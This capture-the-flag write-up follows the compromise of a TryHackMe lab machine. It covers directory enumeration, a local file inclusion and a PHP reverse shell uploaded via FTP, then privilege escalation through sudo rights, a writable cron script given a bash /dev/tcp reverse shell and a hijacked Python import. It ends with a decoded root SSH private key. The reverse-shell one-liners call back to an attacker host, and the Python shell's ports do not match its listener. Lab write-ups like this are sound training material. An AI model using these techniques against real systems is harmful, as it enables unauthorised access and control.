Enumeration
Starting off with an nmap scan, I find that FTP, SSH and HTTP is open
root@kali:~/tryhackme/watcher# nmap -sC -sV 10.10.180.180 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-17 20:44 EST Nmap scan report for 10.10.180.180 Host is up (0.23s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e1:80:ec:1f:26:9e:32:eb:27:3f:26:ac:d2:37:ba:96 (RSA) | 256 36:ff:70:11:05:8e:d4:50:7a:29:91:58:75:ac:2e:76 (ECDSA) |_ 256 48:d2:3e:45:da:0c:f0:f6:65:4e:f9:78:97:37:aa:8a (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: Jekyll v4.1.1 |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Corkplacemats Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel |
Running gobuster to help find directories, I find post.php
and robots.txt
root@kali:~/tryhackme/watcher# gobuster dir -u 10.10.180.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.180.180 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: html,php,txt [+] Timeout: 10s =============================================================== 2021/02/17 20:45:30 Starting gobuster =============================================================== /index.php (Status: 200) /images (Status: 301) /post.php (Status: 200) /css (Status: 301) /robots.txt (Status: 200) |
Flag 1
Going to robots.txt, I find 2 allow files
Looking navigating to 10.10.180.180/flag.txt
I obtain the first flag
Flag 2
Trying to access the /secret_file_do_not_read.txt
file I recieve a 403 error
Going back to my gobuster results, I found /posts.php
Navigating there, the page loads but I do not recieve anything.
I could try fuzzing, but first I went back to the home page and looked at the source code. Here, I find that post.php
takes an arugment of post
Testing this, I find it is vulnerable to local file inclusion by changing the url to post.php?post=../../../../../../etc/passwd
I want to read the /secret_file_do_not_read.txt
that I did not have permission to do earlier. Trying to read the file using the LFI vulnerability works and I find FTP credentials
Using these credentials, I can login to FTP and download the flag_2.txt file
root@kali:~/tryhackme/watcher# ftp 10.10.180.180 Connected to 10.10.180.180. 220 (vsFTPd 3.0.3) Name (10.10.180.180:root): ftpuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 1001 1001 4096 Feb 17 23:31 files -rw-r--r-- 1 0 0 21 Dec 03 01:58 flag_2.txt 226 Directory send OK. ftp> get flag_2.txt local: flag_2.txt remote: flag_2.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for flag_2.txt (21 bytes). 226 Transfer complete. 21 bytes received in 0.00 secs (15.2022 kB/s) |
I can now read the second flag
Flag 3
Looking at the FTP server, I am allowed to upload items in the /files
folder
ftp> dir -a 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. dr-xr-xr-x 3 65534 65534 4096 Dec 03 01:58 . dr-xr-xr-x 3 65534 65534 4096 Dec 03 01:58 .. drwxr-xr-x 2 1001 1001 4096 Feb 17 23:31 files -rw-r--r-- 1 0 0 21 Dec 03 01:58 flag_2.txt 226 Directory send OK. |
I have the ability to upload files via FTP and can then access the files using the LFI vulnerability. I also know the files directory location is /home/ftpuser/ftp/files
thanks to the note that gave me the FTP credentials. This will allow me to get a reverse shell. To start, I download a php reverse shell and edit the IP address. Then I upload it to the files directory of FTP
ftp> put php-reverse-shell.php local: php-reverse-shell.php remote: php-reverse-shell.php 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 5491 bytes sent in 0.00 secs (137.8059 MB/s) |
Now that I have uploaded the file, I start a netcat listener. Then, using the LFI vulnerability, I can access the php file so it executes
curl http://10.10.180.180/post.php?post=../../../../../../../srv/ftp/files/php-reverse-shell.php |
Looking at my netcat listener, I see I receive a connect back.
root@kali:~/tryhackme/watcher# nc -lvnp 1234 listening on [any] 1234 ... connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 56586 Linux watcher 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 02:13:50 up 3:00, 2 users, load average: 0.00, 0.00, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT will pts/6 10.2.8.75 00:50 33:34 0.31s 0.31s -bash root pts/7 10.2.8.75 01:41 32:37 0.02s 0.02s -bash uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ |
I then import python3 into the shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@watcher:/$ ^Z [1]+ Stopped nc -lvnp 1234 root@kali:~/tryhackme/watcher# stty raw -echo root@kali:~/tryhackme/watcher# fg www-data@watcher:/$ |
I can now read the 3rd flag under /var/www/html/more_secrets_a9f10a
Flag 4
As www-data, I see I am allowed to run any command as the toby user
www-data@watcher:/$ sudo -l Matching Defaults entries for www-data on watcher: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on watcher: (toby) NOPASSWD: ALL |
I can easily login to the toby user without using a password by executing bash
www-data@watcher:/$ sudo -u toby /bin/bash toby@watcher:/$ |
As toby, I can now read flag 4
Flag 5
Under toby’s home directory, I find a note stating cronjobs are running, likely under the jobs directory
toby@watcher:~$ ls flag_4.txt jobs note.txt toby@watcher:~$ cat note.txt Hi Toby, I've got the cron jobs set up now so don't worry about getting that done. |
This exploit is easy to find, but you could use pspy to monitor processes to find running cronjobs. Upload the pspy64 file then execute it
toby@watcher:~$ wget 10.2.8.75/pspy64 --2021-02-18 02:25:49-- http://10.2.8.75/pspy64 Connecting to 10.2.8.75:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3078592 (2.9M) [application/octet-stream] Saving to: 'pspy64' pspy64 100%[===================>] 2.94M 463KB/s in 7.6s 2021-02-18 02:25:57 (395 KB/s) - 'pspy64' saved [3078592/3078592] toby@watcher:~$ chmod +x pspy64 toby@watcher:~$ ./pspy64 |
Looking at results, I see that the cow.sh
file under /home/toby/jobs
is a cronjob run every minute
2021/02/18 02:27:01 CMD: UID=1002 PID=1832 | 2021/02/18 02:27:01 CMD: UID=1002 PID=1831 | /bin/bash /home/toby/jobs/cow.sh 2021/02/18 02:27:01 CMD: UID=1002 PID=1830 | /bin/sh -c /home/toby/jobs/cow.sh |
Looking at this file, I see my current user can edit it
toby@watcher:~/jobs$ ls -la cow.sh -rwxr-xr-x 1 toby toby 46 Dec 3 03:31 cow.sh |
I put a bash reverse shell at the bottom of the script to call back to my local machine
toby@watcher:~/jobs$ echo "bash -i >& /dev/tcp/10.2.8.75/8080 0>&1" >> cow.sh |
After, I set up my netcat listener and wait for less than a minute. I recieve a connect back as the mat user
root@kali:~/tryhackme/watcher# nc -lvnp 8080 listening on [any] 8080 ... connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 40798 bash: cannot set terminal process group (1887): Inappropriate ioctl for device bash: no job control in this shell mat@watcher:~$ |
I can now read the 5th flag
Flag 6
There is a note left on mat’s desktop from the will user. This note says I can run a python script as him using sudo
mat@watcher:~$ cat note.txt Hi Mat, I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe. Will |
Running sudo -l
I confirm this is true
mat@watcher:~$ sudo -l Matching Defaults entries for mat on watcher: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User mat may run the following commands on watcher: (will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py * |
Reading the script we can run as will, I see it imports os
sys
and cmd
mat@watcher:~/scripts$ cat will_script.py import os import sys from cmd import get_command cmd = get_command(sys.argv[1]) whitelist = ["ls -lah", "id", "cat /etc/passwd"] if cmd not in whitelist: print("Invalid command!") exit() os.system(cmd) |
Looking at the file permissions, I see my current user owns cmd.py. This means I can insert a commands into cmd.py
and when I run will_script.py
they will execute
mat@watcher:~/scripts$ ls -la total 16 drwxrwxr-x 2 will will 4096 Dec 3 03:31 . drwxr-xr-x 6 mat mat 4096 Dec 3 03:31 .. -rw-r--r-- 1 mat mat 133 Dec 3 03:31 cmd.py -rw-r--r-- 1 will will 208 Dec 3 01:58 will_script.py |
I grab a python reverse shell and insert it in cmd.py
mat@watcher:~/scripts$ echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.9.2.255',9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ATTACKER_IP”,5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);
And running will_script.py as will by typing the following will get us a shell.
mat@watcher:~/scripts$ sudo -u will python3 /home/mat/scripts/will_script.py cmd.py
Looking at my netcat listener, I received a connect back as will
root@kali:~/tryhackme/watcher# nc -lvnp 1234 listening on [any] 1234 ... connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 38226 $ whoami will |
I import python3 into the shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")' will@watcher:~/scripts$ ^Z [1]+ Stopped nc -lvnp 1234 root@kali:~/tryhackme/watcher# stty raw -echo root@kali:~/tryhackme/watcher# nc -lvnp 1234 will@watcher:~/scripts$ |
Now, I can read the 6th flag
Flag 7
Looking into the will user, I find he is part of the adm group
will@watcher:/home/will$ id uid=1000(will) gid=1000(will) groups=1000(will),4(adm) |
Since this is an unusual group, I want to find if there are any files under this group. Here, I find a file named key.64
will@watcher:/home/will$ find / -group adm /opt/backups /opt/backups/key.b64 |
Reading the file shows a large base64 value
will@watcher:/home/will$ cat /opt/backups/key.b64 LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBelBhUUZvbFFx OGNIb205bXNzeVBaNTNhTHpCY1J5QncrcnlzSjNoMEpDeG5WK2FHCm9wWmRjUXowMVlPWWRqWUlh WkVKbWRjUFZXUXAvTDB1YzV1M2lnb2lLMXVpWU1mdzg1ME43dDNPWC9lcmRLRjQKanFWdTNpWE45 ZG9CbXIzVHVVOVJKa1ZuRER1bzh5NER0SXVGQ2Y5MlpmRUFKR1VCMit2Rk9ON3E0S0pzSXhnQQpu TThrajhOa0ZrRlBrMGQxSEtIMitwN1FQMkhHWnJmM0RORm1RN1R1amEzem5nYkVWTzdOWHgzVjNZ T0Y5eTFYCmVGUHJ2dERRVjdCWWI2ZWdrbGFmczRtNFhlVU8vY3NNODRJNm5ZSFd6RUo1enBjU3Jw bWtESHhDOHlIOW1JVnQKZFNlbGFiVzJmdUxBaTUxVVIvMndOcUwxM2h2R2dscGVQaEtRZ1FJREFR QUJBb0lCQUhtZ1RyeXcyMmcwQVRuSQo5WjVnZVRDNW9VR2padjdtSjJVREZQMlBJd3hjTlM4YUl3 YlVSN3JRUDNGOFY3cStNWnZEYjNrVS80cGlsKy9jCnEzWDdENTBnaWtwRVpFVWVJTVBQalBjVU5H VUthWG9hWDVuMlhhWUJ0UWlSUjZaMXd2QVNPMHVFbjdQSXEyY3oKQlF2Y1J5UTVyaDZzTnJOaUpR cEdESkRFNTRoSWlnaWMvR3VjYnluZXpZeWE4cnJJc2RXTS8wU1VsOUprbkkwUQpUUU9pL1gyd2Z5 cnlKc20rdFljdlk0eWRoQ2hLKzBuVlRoZWNpVXJWL3drRnZPRGJHTVN1dWhjSFJLVEtjNkI2CjF3 c1VBODUrdnFORnJ4ekZZL3RXMTg4VzAwZ3k5dzUxYktTS0R4Ym90aTJnZGdtRm9scG5Gdyt0MFFS QjVSQ0YKQWxRSjI4a0NnWUVBNmxyWTJ4eWVMaC9hT0J1OStTcDN1SmtuSWtPYnBJV0NkTGQxeFhO dERNQXo0T3FickxCNQpmSi9pVWNZandPQkh0M05Oa3VVbTZxb0VmcDRHb3UxNHlHek9pUmtBZTRI UUpGOXZ4RldKNW1YK0JIR0kvdmoyCk52MXNxN1BhSUtxNHBrUkJ6UjZNL09iRDd5UWU3OE5kbFF2 TG5RVGxXcDRuamhqUW9IT3NvdnNDZ1lFQTMrVEUKN1FSNzd5UThsMWlHQUZZUlhJekJncDVlSjJB QXZWcFdKdUlOTEs1bG1RL0UxeDJLOThFNzNDcFFzUkRHMG4rMQp2cDQrWThKMElCL3RHbUNmN0lQ TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2 TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0 bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4 NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4 STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo= |
Decrypting this base64 value shows an id_rsa.
will@watcher:/home/will$ cat /opt/backups/key.b64 | base64 -d -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAzPaQFolQq8cHom9mssyPZ53aLzBcRyBw+rysJ3h0JCxnV+aG opZdcQz01YOYdjYIaZEJmdcPVWQp/L0uc5u3igoiK1uiYMfw850N7t3OX/erdKF4 jqVu3iXN9doBmr3TuU9RJkVnDDuo8y4DtIuFCf92ZfEAJGUB2+vFON7q4KJsIxgA nM8kj8NkFkFPk0d1HKH2+p7QP2HGZrf3DNFmQ7Tuja3zngbEVO7NXx3V3YOF9y1X eFPrvtDQV7BYb6egklafs4m4XeUO/csM84I6nYHWzEJ5zpcSrpmkDHxC8yH9mIVt dSelabW2fuLAi51UR/2wNqL13hvGglpePhKQgQIDAQABAoIBAHmgTryw22g0ATnI 9Z5geTC5oUGjZv7mJ2UDFP2PIwxcNS8aIwbUR7rQP3F8V7q+MZvDb3kU/4pil+/c q3X7D50gikpEZEUeIMPPjPcUNGUKaXoaX5n2XaYBtQiRR6Z1wvASO0uEn7PIq2cz BQvcRyQ5rh6sNrNiJQpGDJDE54hIigic/GucbynezYya8rrIsdWM/0SUl9JknI0Q TQOi/X2wfyryJsm+tYcvY4ydhChK+0nVTheciUrV/wkFvODbGMSuuhcHRKTKc6B6 1wsUA85+vqNFrxzFY/tW188W00gy9w51bKSKDxboti2gdgmFolpnFw+t0QRB5RCF AlQJ28kCgYEA6lrY2xyeLh/aOBu9+Sp3uJknIkObpIWCdLd1xXNtDMAz4OqbrLB5 fJ/iUcYjwOBHt3NNkuUm6qoEfp4Gou14yGzOiRkAe4HQJF9vxFWJ5mX+BHGI/vj2 Nv1sq7PaIKq4pkRBzR6M/ObD7yQe78NdlQvLnQTlWp4njhjQoHOsovsCgYEA3+TE 7QR77yQ8l1iGAFYRXIzBgp5eJ2AAvVpWJuINLK5lmQ/E1x2K98E73CpQsRDG0n+1 vp4+Y8J0IB/tGmCf7IPMeiX80YJW7Ltozr7+sfbAQZ1Ta2o1hCalAQyIk9p+EXpI UbBVnyUC1XcvRfQvFJyzgccwExEr6glJKOj64bMCgYEAlxmx/jxKZLTWzxxb9V4D SPs+NyJeJMqMHVL4VTGh2vnFuTuq2cIC4m53zn+xJ7ezpb1rA85JtD2gnj6nSr9Q A/HbjJuZKwi8uebquizot6uFBzpouPSuUzA8s8xHVI6edV1HC8ip4JmtNPAWHkLZ gLLVOk0gz7dvC3hGc12BrqcCgYAhFji34iLCi3Nc1lsvL4jvSWnLeMXnQbu6P+Bd bKiPwtIG1Zq8Q4Rm6qqC9cno8NbBAtiD6/TCX1kz6iPq8v6PQEb2giijeYSJBYUO kJEpEZMF308Vn6N6/Q8DYavJVc+tm4mWcN2mYBzUGQHmb5iJjkLE2f/TwYTg2DB0 mEGDGwKBgQCh+UpmTTRx4KKNy6wJkwGv2uRdj9rta2X5pzTq2nEApke2UYlP5OLh /6KHTLRhcp9FmF9iKWDtEMSQ8DCan5ZMJ7OIYp2RZ1RzC9Dug3qkttkOKAbccKn5 4APxI1DxU+a2xXXf02dsQH0H5AhNCiTBD7I5YRsM1bOEqjFdZgv6SA== -----END RSA PRIVATE KEY----- |
I copy this id_rsa to my local machine and change the file permissions so it is useable
root@kali:~/tryhackme/watcher# chmod 600 id_rsa |
Testing this id_rsa on root, I find it is valid and allows me to login
root@kali:~/tryhackme/watcher# ssh -i id_rsa root@10.10.180.180 load pubkey "id_rsa": invalid format Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Feb 18 02:48:28 UTC 2021 System load: 0.0 Processes: 122 Usage of /: 22.3% of 18.57GB Users logged in: 0 Memory usage: 38% IP address for eth0: 10.10.180.180 Swap usage: 0% IP address for lxdbr0: 10.14.179.1 33 packages can be updated. 0 updates are security updates. Last login: Thu Dec 3 03:25:38 2020 root@watcher:~# |
As root, I can now read the final flag